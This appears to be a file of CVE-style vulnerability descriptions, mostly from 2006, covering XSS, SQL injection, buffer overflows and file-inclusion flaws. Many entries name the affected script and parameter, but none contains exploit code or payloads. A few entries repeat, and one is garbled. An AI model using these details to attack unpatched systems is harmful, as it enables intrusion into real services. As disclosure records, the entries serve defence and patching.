Stack-based buffer overflow in Pragma FortressSSH 4.0.7.20 allows remote attackers to execute arbitrary code via long SSH_MSG_KEXINIT messages, which may cause an overflow when being logged.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerabilities in certain versions of phpMyAdmin before 2.8.0.4 allow remote attackers to inject arbitrary web script or HTML via the db parameter in unknown scripts.
Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.8.0.x before 2.8.0.4 allows remote attackers to inject arbitrary web script or HTML via the theme parameter in unknown scripts.  NOTE: the lang parameter is already covered by CVE-2006-2031.
Buffer overflow in FileZilla before 2.2.23 allows remote attackers to execute arbitrary commands via unknown attack vectors.
Buffer overflow in the TCP/IP Protocol driver in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via unknown vectors related to IP source routing.
Multiple cross-site scripting (XSS) vulnerabilities in various scripts in Web-Labs CMS allow remote attackers to inject arbitrary web script or HTML via (1) the search parameter and (2) unspecified fields related to e-mail alerts.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Ipswitch WhatsUp Professional 2006 and Ipswitch WhatsUp Professional 2006 Premium allows remote attackers to obtain full path information via 404 error messages.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
NmConsole/Login.asp in Ipswitch WhatsUp Professional 2006 and Ipswitch WhatsUp Professional 2006 Premium generates different error messages in a way that allows remote attackers to enumerate valid usernames. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in IPswitch WhatsUp Professional 2006 and WhatsUp Professional 2006 Premium allow remote attackers to inject arbitrary web script or HTML via unknown vectors in (1) NmConsole/Tools.asp and (2) NmConsole/DeviceSelection.asp.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in inc/elementz.php in AliPAGER 1.5 allows remote attackers to inject arbitrary web script or HTML via the ubild parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.  NOTE: this issue might be resultant from SQL injection.
Cross-site scripting (XSS) vulnerability in Search.do in ManageEngine OpManager 6.0 allows remote attackers to inject arbitrary web script or HTML via the searchTerm parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Directory traversal vulnerability in index.php in OnlyScript.info Online Universal Payment System Script allows remote attackers to read arbitrary files via directory traversal sequences in the read parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in OnlyScript.info Online Universal Payment System Script allows remote attackers to inject arbitrary web script or HTML via the read parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  Also, this issue might be resultant from directory traversal.
Multiple cross-site scripting (XSS) vulnerabilities in Ideal Science Ideal BB 1.5.4a and earlier allow remote attackers to inject arbitrary web script or HTML via unknown vectors.  NOTE: due to lack of details from the researcher, it is not clear whether this overlaps CVE-2004-2207.
Cross-site scripting (XSS) vulnerability in moreinfo.asp in EPublisherPro allows remote attackers to inject arbitrary web script or HTML via the title parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Jadu CMS allow remote attackers to inject arbitrary web script or HTML via the (1) forename, (2) surname, (3) reg_email, (4) email_conf, (5) company, (6) city, (7) postcode, or (8) telephone parameters to site/scripts/register.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
SQL injection vulnerability in search_result.asp in EDirectoryPro 2.0 and earlier allows remote attackers to execute arbitrary SQL commands via the keyword parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
SQL injection vulnerability in all_calendars.asp in MultiCalendars 3.0 allows remote attackers to execute arbitrary SQL commands via the calsids parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple SQL injection vulnerabilities in IA-Calendar allow remote attackers to execute arbitrary SQL commands via the (1) type parameter in (a) calendar_new.asp and (b) default.asp, and (2) ID parameter in (c) calendar_detail.asp.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in calendar_new.asp in IA-Calendar allows remote attackers to inject arbitrary web script or HTML via the TypeName1 parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Buffer overflow in avahi-core in Avahi before 0.6.10 allows local users to execute arbitrary code via unknown vectors.
Kerio WinRoute Firewall before 6.2.1 allows remote attackers to cause a denial of service (application crash) via unknown vectors in the "email protocol inspectors," possibly (1) SMTP and (2) POP3.
Cross-site scripting vulnerability in admin/main.asp in Ocean12 Calendar Manager Pro 1.00 allows remote attackers to inject arbitrary web script or HTML via the date parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in Ocean12 Calendar Manager Pro 1.00 allow remote attackers to execute arbitrary SQL commands via the (1) date parameter to admin/main.asp, (2) SearchFor parameter to admin/view.asp, or (3) ID parameter to admin/edit.asp.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the project module (project.module) in Drupal 4.5 and 4.6 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
SQL injection vulnerability in index.php in Invision Power Board allows remote attackers to execute arbitrary SQL commands via the pid parameter in a reputation action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in index.php in PHP Arena paCheckBook 1.1 allow remote attackers to execute arbitrary SQL commands via (1) the transtype parameter in an add action or (2) entry parameter in an edit action.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in Kerio MailServer before 6.1.4 has unknown impact and remote attack vectors related to a "possible bypass of attachment filter."
Unspecified vulnerability in pinball 0.3.1 allows local users to gain privileges via unknown attack vectors that cause pinball to load plugins from an attacker-controlled directory while operating at raised privileges.
SQL injection vulnerability in detail.asp in DUclassified allows remote attackers to execute arbitrary SQL commands via the iPro parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in the report interface in Network Administration Visualized (NAV) before 3.0.1 allow remote attackers to execute arbitrary SQL commands via unknown vectors.
Cross-site scripting (XSS) vulnerability in Edgewall Software Trac 0.9.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors related to a "wiki macro."
Unspecified vulnerability in HP StorageWorks Secure Path for Windows 4.0C-SP2 before 20060419 allows remote attackers to cause an unspecified denial of service via unknown vectors.
Buffer overflow in Paul Rombouts pdnsd before 1.2.4 has unknown impact and attack vectors.  NOTE: this issue might be related to the OUSPG PROTOS DNS test suite.
Unspecified vulnerability in Juniper Networks JUNOSe E-series routers before 7-1-1 has unknown impact and remote attack vectors related to the DNS "client code," as demonstrated by the OUSPG PROTOS DNS test suite.
Unspecified vulnerability in the libpkcs11 library in Sun Solaris 10 might allow local users to gain privileges or cause a denial of service (application failure) via unknown attack vectors that involve the getpwnam family of non-reentrant functions.
PhpWebGallery before 1.6.0RC1 allows remote attackers to obtain arbitrary pictures via a request to picture.php without specifying the cat parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple SQL injection vulnerabilities in the osTicket module in Help Center Live before 2.1.0 allow remote attackers to execute arbitrary SQL commands via unknown vectors.
Multiple directory traversal vulnerabilities in IZArc Archiver 3.5 beta 3 allow remote attackers to write arbitrary files via a ..\ (dot dot backslash) in a (1) .rar, (2) .tar, (3) .zip, (4) .jar, or (5) .gz archive.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in cgi-bin/guest in Community Architect Guestbook allows remote attackers to inject arbitrary web script or HTML by signing the guestbook, which is displayed by fsguestbook.html.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Sybase Pylon Anywhere groupware synchronization server before 7.0 allows local users to obtain sensitive information such as email and PIM data of another user via unknown attack vectors.
Off-by-one error in the OID printing routine in Ethereal 0.10.x up to 0.10.14 has unknown impact and remote attack vectors.
SQL injection vulnerability in functions/db_api.php in LinPHA 1.1.1 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in index.php in PMTool 1.2.2 allows remote attackers to execute arbitrary SQL commands via the order parameter in the include files (1) user.inc.php, (2) customer.inc.php, and (3) project.inc.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
config.php in S9Y Serendipity 1.0 beta 2 allows remote attackers to inject arbitrary PHP code by editing values that are stored in config.php and later executed.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting vulnerability in addevent.php in myEvent 1.x allows remote attackers to inject arbitrary web script or HTML via the event_desc parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in myEvent 1.x allow remote attackers to inject arbitrary SQL commands via the event_id parameter to (1) addevent.php or (2) del.php or (3) event_desc parameter to addevent.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Oracle JD Edwards EnterpriseOne Security Server 8.95.J1 has unknown impact and attack vectors, aka Vuln# JDE01.
Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise 8.46.12 and 8.47.04 has unknown impact and attack vectors, aka Vuln# PSE01.
Multiple unspecified vulnerabilities in the Reporting Framework component in Oracle Enterprise Manager 9.0.1.5 and 9.2.0.7 have unknown impact and attack vectors, aka Vuln# (1) EM01 and (2) EM02.
Unspecified vulnerability in the Oracle Thesaurus Management System component in Oracle E-Business Suite and OPA 4.5.2 Applications has unknown impact and attack vectors, aka Vuln# OPA01.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite and Applications 11.5.10CU1 has unknown impact and attack vectors, aka Vuln# APPS05.
Multiple unspecified vulnerabilities in Oracle E-Business Suite and Applications 11.5.10 have unknown impact and attack vectors, as identified by Vuln# (1) APPS03 in (a) iProcurement; (2) APPS04 in (b) Oracle Application Object Library; (3) APPS06, (4) APPS07, and (5) APPS08 in (c) Oracle Applications Technology Stack; and (6) APPS11 in (d) Oracle Order Capture.
Unspecified vulnerability in the Financials for Asia/Pacific component in Oracle E-Business Suite and Applications 11.5.9 has unknown impact and attack vectors.  component, aka Vuln# APPS02.
Multiple unspecified vulnerabilities in Oracle E-Business Suite and Applications 11.5.10CU2 have unknown impact and attack vectors, as identified by Vuln# (1) APPS01 in the (a) Application Install component; (2) APPS09 in the (b) Oracle Diagnostics Interfaces component; (3) APPS10 in the (c) Oracle General Ledger component; (4) APPS12 and (5) APPS13 in the (d) Oracle Receivables component.
Multiple unspecified vulnerabilities in the Email Server component in Oracle Collaboration Suite 9.0.4.2, 10.1.1, 10.1.2.0, and 10.1.2.1 have unknown impact and attack vectors, aka Vuln# (1) OCS01, (2) OCS02, (3) OCS03, and (4) OCS04.
Unspecified vulnerability in Oracle Database Server 8.1.7.4, 9.0.1.5, and 9.2.0.7 has unknown impact and attack vectors in the Oracle Spatial component, aka Vuln# DB13.
Unspecified vulnerability in Oracle Database Server 9.2.0.7 and 10.1.0.4 has unknown impact and attack vectors in the Oracle Spatial component, aka Vuln# DB12.  NOTE: details are unavailable from Oracle, but as of 20060421, they have not publicly disputed a claim by a reliable independent researcher that states that the problem is SQL injection in the (1) GEN_RID_RANGE_BY_AREA and (2) GEN_RID_RANGE functions in the MDSYS.SDO_PRIDX package.
Unspecified vulnerability in Oracle Database Server 9.0.1.5, 9.2.0.7, and 10.1.0.5 has unknown impact and attack vectors in the Oracle Spatial component, aka Vuln# DB11.  NOTE: Oracle has not disputed reliable researcher claims that this issue is SQL injection in MDSYS.SDO_LRS_TRIG_INS.
Unspecified vulnerability in Oracle Database Server 8.1.7.4, 9.0.1.5, and 9.2.0.6 has unknown impact and attack vectors in the Oracle Spatial component, aka Vuln# DB09.  NOTE: Oracle has not disputed reliable claims that this issue is SQL injection in MDSYS.PRVT_IDX using the (1) EXECUTE_INSERT, (2) EXECUTE_DELETE, (3) EXECUTE_UPDATE, (4) EXECUTE UPDATE, and (5) CRT_DUMMY functions.
Unspecified vulnerability in Oracle Database Server 9.2.0.7, 10.1.0.4, and 10.2.0.1 has unknown impact and attack vectors in the Oracle Spatial component, aka Vuln# DB08.
Unspecified vulnerability in Oracle Database Server 9.0.1.5 and 9.2.0.7 has unknown impact and attack vectors in the Oracle Enterprise Manager Intelligent Agent component, aka Vuln# DB07.
Unspecified vulnerability in Oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and 10.2.0.2 has unknown impact and attack vectors in the Export component, aka Vuln# DB05.  NOTE: details are unavailable from Oracle, but as of 20060427, they have not publicly commented on whether DB05 is the same issue as CVE-2006-2081.
Unspecified vulnerability in Oracle Database Server 8.1.7.4 and 9.0.1.5 has unknown impact and attack vectors in the Dictionary component, aka Vuln# DB04.
Unspecified vulnerability in Oracle Database Server 9.2.0.6 has unknown impact and attack vectors in the Advanced Replication component, aka Vuln# DB02.
Multiple unspecified vulnerabilities in Oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and other versions have unknown impact and attack vectors in the (1) Advanced Replication component, as identified by Vuln# DB01, and (2) Oracle Spatial component, as identified by Vuln# DB10.  NOTE: details are unavailable from Oracle, but as of 20060421, they have not publicly disputed a claim by a reliable independent researcher that states that DB01 is an unknown issue in the DBMS_REPUTIL package, and DB10 is SQL injection in the INSERT_CATALOG, UPDATE_CATALOG, and DELETE_CATALOG functions of the SDO_CATALOG package.
SQL injection vulnerability in the Your_Account module in PHP-Nuke 7.8 might allows remote attackers to execute arbitrary SQL commands via the user_id parameter in the Your_Home functionality.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the Your_Account module in PHP-Nuke 7.8 might allows remote attackers to inject arbitrary HTML and web script via the ublock parameter, which is saved in the user's personal menu.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. In addition, it is unclear whether this issue is a vulnerability, since it is related to the user's personal menu, which presumably is not modifiable by others.
Cross-site scripting (XSS) vulnerability in global.php in ShoutBOOK 1.1 allows remote attackers to inject arbitrary web script or HTML via the (1) LOCATION and (2) URL parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in register.php in Tritanium Bulletin Board (TBB) 1.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) newuser_realname and (2) newuser_icq parameters, a different vector than CVE-2006-1768.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the POP service in MailEnable Standard Edition before 1.94, Professional Edition before 1.74, and Enterprise Edition before 1.22 has unknown attack vectors and impact related to "authentication exploits".  NOTE: this is a different set of affected versions, and probably a different vulnerability than CVE-2006-1337.
Hosting Controller 6.1 stores forum/db/forum.mdb under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as user name and password credentials.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple SQL injection vulnerabilities in MvBlog before 1.6 allow remote attackers to execute arbitrary SQL commands via unknown vectors.
Cross-site scripting (XSS) vulnerability in login.php in Bitweaver 1.3 allows remote attackers to inject arbitrary web script or HTML via the error parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in form.php in JBook 1.4 allow remote attackers to execute arbitrary SQL commands via the (1) nom or (2) mail parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Mozilla Firefox and Thunderbird 1.x before 1.5.0.2 and 1.0.x before 1.0.8, Mozilla Suite before 1.7.13, and SeaMonkey before 1.0.1 allows remote attackers to execute arbitrary code via unknown vectors related to the crypto.generateCRMFRequest method.
Unspecified vulnerability in Firefox and Thunderbird 1.5 before 1.5.0.2, and SeaMonkey before 1.0.1, allows remote attackers to bypass the js_ValueToFunctionObject check and execute arbitrary code via unknown vectors involving setTimeout and Firefox' ForEach method.
Unspecified vulnerability in Firefox and Thunderbird before 1.5.0.2, and SeaMonkey before 1.0.1, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown attack vectors related to DHTML.  NOTE: due to the lack of sufficient public details from the vendor as of 20060413, it is unclear how CVE-2006-1529, CVE-2006-1530, CVE-2006-1531, and CVE-2006-1723 are different.
Cross-site scripting (XSS) vulnerability in Matt Wright Guestbook 2.3.1 allows remote attackers to execute arbitrary web script or HTML via the (1) url, (2) city, (3) state, or (4) country parameters. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information, although it is likely that they are the result of post-disclosure analysis.
Cross-site scripting (XSS) vulnerability in Gallery before 1.5.3 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Multiple SQL injection vulnerabilities in MWNewsletter 1.0.0b allow remote attackers to execute arbitrary SQL commands via the (1) user_email parameter to (a) unsubscribe.php or (b) subscribe.php; or the (2) user_name parameter to subscribe.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information, although it is likely that this was discovered during post-disclosure analysis.
Multiple PHP remote file inclusion vulnerabilities in SQuery 4.5 and earlier, as used in products such as Autonomous LAN party (ALP), allow remote attackers to execute arbitrary PHP code via a URL in the libpath parameter to scripts in the lib directory including (1) ase.php, (2) devi.php, (3) doom3.php, (4) et.php, (5) flashpoint.php, (6) gameSpy.php, (7) gameSpy2.php, (8) gore.php, (9) gsvari.php, (10) halo.php, (11) hlife.php, (12) hlife2.php, (13) igi2.php, (14) main.lib.php, (15) netpanzer.php, (16) old_hlife.php, (17) pkill.php, (18) q2a.php, (19) q3a.php, (20) qworld.php, (21) rene.php, (22) rvbshld.php, (23) savage.php, (24) simracer.php, (25) sof1.php, (26) sof2.php, (27) unreal.php, (28) ut2004.php, and (29) vietcong.php. NOTE: the lib/armygame.php vector is already covered by CVE-2006-1610. The provenance of most of these additional vectors is unknown, although likely from post-disclosure analysis.  NOTE: this only occurs when register_globals is disabled.
Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.8.0.3 allow remote attackers to inject arbitrary web script or HTML via unknown vectors in unspecified scripts in the themes directory.
Cross-site scripting (XSS) vulnerability in image_desc.php in Softbiz Image Gallery allows remote attackers to inject arbitrary web script or HTML via msg parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
login.php in Interact 2.1.1 generates different responses depending on whether or not a username is valid, which allows remote attackers to determine valid usernames.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in login.php in Interact 2.1.1 allows remote attackers to execute arbitrary SQL commands via the user_name parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party.
Cross-site scripting (XSS) vulnerability in Interact 2.1.1 allows remote attackers to inject arbitrary web script or HTML via (1) the search_terms parameter to (a) search.php, and (2) the first_name, (3) last_name, (4) email, (5) password, and (6) confirm_password parameters to (b) userinput.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party.  In addition, the lack of precision in the third party descriptions makes it unclear whether the named vectors are correct.
Unspecified vulnerability in the banner module in Exponent CMS before 0.96.5 RC 1 allows "php injection" via unknown attack vectors.
Unspecified vulnerability in the image module in Exponent CMS before 0.96.5 RC 1 allows "directory disclosure" with unknown attack vectors.
Unspecified vulnerability in the image module in Exponent CMS before 0.96.5 RC 1 allows remote attackers to execute arbitrary code via unknown vectors involving "parsed PHP."
Unspecified vulnerability in Exponent CMS before 0.96.5 RC 1 has unknown impact and remote attack vectors related to variables that are not "typecasted."
Cross-site scripting (XSS) vulnerability in profile.php in phpBB 2.0.19 allows remote attackers to inject arbitrary web script or HTML via the cur_password parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Groupmax World Wide Web, World Wide Web Desktop, World Wide Web for Scheduler, and Desktop for Scheduler, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in Esqlanelapse 2.0 and 2.2 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
SQL injection vulnerability in PHP Script Index allows remote attackers to execute arbitrary SQL commands via the search parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple buffer overflows in the xfig import code (xfig-import.c) in Dia 0.87 and later before 0.95-pre6 allow user-assisted attackers to have an unknown impact via a crafted xfig file, possibly involving an invalid (1) color index, (2) number of points, or (3) depth.
Unspecified vulnerability in Firefox and Thunderbird before 1.5.0.2, and SeaMonkey before 1.0.1, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown attack vectors related to DHTML.  NOTE: due to the lack of sufficient public details from the vendor as of 20060413, it is unclear how CVE-2006-1529, CVE-2006-1530, CVE-2006-1531, and CVE-2006-1723 are different.
Unspecified vulnerability in Firefox and Thunderbird before 1.5.0.2, and SeaMonkey before 1.0.1, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown attack vectors related to DHTML.  NOTE: due to the lack of sufficient public details from the vendor as of 20060413, it is unclear how CVE-2006-1529, CVE-2006-1530, CVE-2006-1531, and CVE-2006-1723 are different.
Unspecified vulnerability in Firefox and Thunderbird before 1.5.0.2, and SeaMonkey before 1.0.1, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown attack vectors related to DHTML.  NOTE: due to the lack of sufficient public details from the vendor as of 20060413, it is unclear how CVE-2006-1529, CVE-2006-1530, CVE-2006-1531, and CVE-2006-1723 are different.
The SCTP-netfilter code in Linux kernel before 2.6.16.13 allows remote attackers to trigger a denial of service (infinite loop) via unknown vectors that cause an invalid SCTP chunk size to be processed by the for_each_sctp_chunk function.
The __group_complete_signal function in the RCU signal handling (signal.c) in Linux kernel 2.6.16, and possibly other versions, has unknown impact and attack vectors related to improper use of BUG_ON.
Buffer overflow in the addnewword function in typespeed 0.4.4 and earlier might allow remote attackers to execute arbitrary code via unknown vectors.
gm-upload.cgi in Greymatter 1.3.1 allows remote authenticated users with upload privileges to execute arbitrary programs by uploading files to locations within the web root.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Integer overflow in AFP Server for Apple Mac OS X 10.3.9 and 10.4.7 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors.
Unspecified vulnerability in AFP Server in Apple Mac OS X 10.3.9 allows remote attackers to determine names of unauthorized files and folders via unknown vectors related to the search results.
Multiple cross-site scripting (XSS) vulnerabilities in search.php in Calendar Express 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) allwords or (2) oneword parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in searchresult.php in Meeting Reserve 1.0 beta allows remote attackers to inject arbitrary web script or HTML via the search_term parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Cholod MySQL Based Message Board allow remote attackers to inject arbitrary web script or HTML via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
SQL injection vulnerability in mb.cgi in Cholod MySQL Based Message Board allows remote attackers to execute arbitrary SQL commands via unspecified vectors in a showmessage action, possibly the username parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to execute HTA files via unknown vectors.
Buffer overflow in RealNetworks RealPlayer 10.5 6.0.12.1040 through 6.0.12.1348, RealPlayer 10, RealOne Player v2, RealOne Player v1, RealPlayer 8, and RealPlayer Enterprise before 20060322 allows remote attackers to have an unknown impact via a malicious Mimio boardCast (mbc) file.
BEA WebLogic Server 6.1 SP7 and earlier allows remote attackers to read arbitrary files via unknown attack vectors related to a "default internal servlet" accessed through HTTP.
Buffer overflow in the POP 3 (POP3) service in MailEnable Standard Edition before 1.93, Professional Edition before 1.73, and Enterprise Edition before 1.21 allows remote attackers to execute arbitrary code via unknown vectors before authentication.
Cross-site scripting (XSS) vulnerability in Streber 0.055 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in zones.php in Inprotect 0.21 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Description field.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple "unannounced" cross-site scripting (XSS) vulnerabilities in WordPress before 2.0.2 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Multiple SQL injection vulnerabilities in ASPPortal 3.00 have unknown impact and attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in ASPPortal 3.00 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Unspecified vulnerability in BorderWare MXtreme 5.0 and 6.0 allows remote attackers to have an unknown impact via unknown attack vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Webmail module in Winmail before 4.3 has unknown impact and unknown remote attack vectors.
Unspecified vulnerability in certain versions of xpdf after 3.00, as used in various products including (a) pdfkit.framework, (b) gpdf, (c) pdftohtml, and (d) libextractor, has unknown impact and user-assisted attack vectors, possibly involving errors in (1) gmem.c, (2) SplashXPathScanner.cc, (3) JBIG2Stream.cc, (4) JPXStream.cc, and/or (5) Stream.cc.  NOTE: this description is based on Debian advisory DSA 979, which is based on changes that were made after other vulnerabilities such as CVE-2006-0301 and CVE-2005-3624 through CVE-2005-3628 were fixed.  Some of these newer fixes appear to be security-relevant, although it is not clear if they fix specific issues or are defensive in nature.
Cross-site scripting (XSS) vulnerability in issue/createissue.aspx in Gemini 2.0 allows remote attackers to inject arbitrary web script or HTML via the rtcDescription$RadEditor1 field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in search.asp in Hosting Controller 6.1 (Hotfix 2.9) allows remote attackers to execute arbitrary SQL commands via the search parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Drupal 4.5.x before 4.5.8 and 4.6.x before 4.5.8 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Integer overflow in the mach_msg_send function in the kernel for Mac OS X might allow local users to execute arbitrary code via unknown attack vectors related to a large message header size, which leads to a heap-based buffer overflow.
Unspecified vulnerability in the HTTP proxy in Novell BorderManager 3.8 and earlier allows remote attackers to cause a denial of service (CPU consumption and ABEND) via unknown attack vectors related to "media streaming over HTTP 1.1".
Cross-site scripting (XSS) vulnerability in Microsoft Exchange Server 2000 SP1 through SP3, when running Outlook Web Access (OWA), allows user-assisted remote attackers to inject arbitrary HTML or web script via unknown vectors related to "HTML parsing."
Microsoft Internet Explorer 5.01 through 6 allows remote attackers to conduct phishing attacks by spoofing the address bar and other parts of the trust UI via unknown methods that allow "window content to persist" after the user has navigated to another site, aka the "Address Bar Spoofing Vulnerability."  NOTE: this is a different vulnerability than CVE-2006-1626.
Cross-site scripting (XSS) vulnerability in the mediamanager module in DokuWiki before 2006-03-05 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors relating to "handling EXIF data."
PHP remote file inclusion vulnerability in index.php in M-Phorum 0.2 allows remote attackers to include arbitrary files via the go parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Ravenous Web Server before 0.7.1 allows remote attackers to access arbitrary rvplg files, with unknown impact.
Unspecified vulnerability in the web server code in Xerox CopyCentre and Xerox WorkCentre Pro, running software 1.001.02.073 or earlier, or 1.001.02.074 before 1.001.02.715, allows remote attackers to cause a denial of service (memory corruption) via unknown vectors.
Buffer overflow in the PostScript file interpreter code for Xerox CopyCentre and Xerox WorkCentre Pro, running software 1.001.02.073 or earlier, or 1.001.02.074 before 1.001.02.715, allows attackers to cause a denial of service via unknown vectors.
PHP remote file include vulnerability in logIT 1.3 and 1.4 allows remote attackers to execute arbitrary PHP code via a URL in the pg parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in IBM WebSphere 5.0.2.10 through 5.0.2.15 and 5.1.1.4 through 5.1.1.9 allows remote attackers to obtain sensitive information via unknown attack vectors, which causes JSP source code to be revealed.
Unspecified vulnerability in the pagedata subsystem of the process file system (/proc) in Solaris 8 through 10 allows local users to cause a denial of service (system hang or panic) via unknown attack vectors that cause cause the kmem_oversize arena to allocate a large amount of system memory that does not get freed.
Kaspersky Antivirus 5.0.5 and 5.5.3 allows remote attackers to cause a denial of service (CPU and memory consumption) via unknown attack vectors.
Unspecified vulnerability in the session handling for Geeklog 1.4.x before 1.4.0sr2, 1.3.11 before 1.3.11sr5, 1.3.9 before 1.3.9sr5, and possibly earlier versions allows attackers to gain privileges as arbitrary users via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Lurker 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Unspecified vulnerability in lurker.cgi for Lurker 2.0 and earlier allows attackers to read arbitrary files via unknown vectors.
SQL injection vulnerability in Akarru Social BookMarking Engine before 0.4.3.4 allows remote attackers to execute arbitrary SQL commands via unknown attack vectors, possibly involving the username parameter to akarru.lib/users.php.
** DISPUTED **
Multiple SQL injection vulnerabilities in the Admin functionality in Joomla! 1.0.7 and earlier allow remote authenticated administrators to execute arbitrary SQL commands via unknown attack vectors.
Unspecified vulnerability in the "Remember Me login functionality" in Joomla! 1.0.7 and earlier has unknown impact and attack vectors.
Multiple buffer overflows in LISTSERV 14.3 and 14.4, including LISTSERV Lite and HPO, with the web archive interface enabled, allow remote attackers to execute arbitrary code via unknown attack vectors related to the WA CGI.  NOTE: technical details will be released after the grace period has ended on 20060603.
Buffer overflow in SecureCRT 5.0.4 and earlier and SecureFX 3.0.4 and earlier allows remote attackers to have an unknown impact when a Unicode string is converted to a "narrow" string.
SQL injection vulnerability in the Oracle Diagnostics module 2.2 and earlier allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
Multiple unspecified vulnerabilities in the Oracle Diagnostics module 2.2 and earlier have unknown impact and attack vectors, related to "permissions."
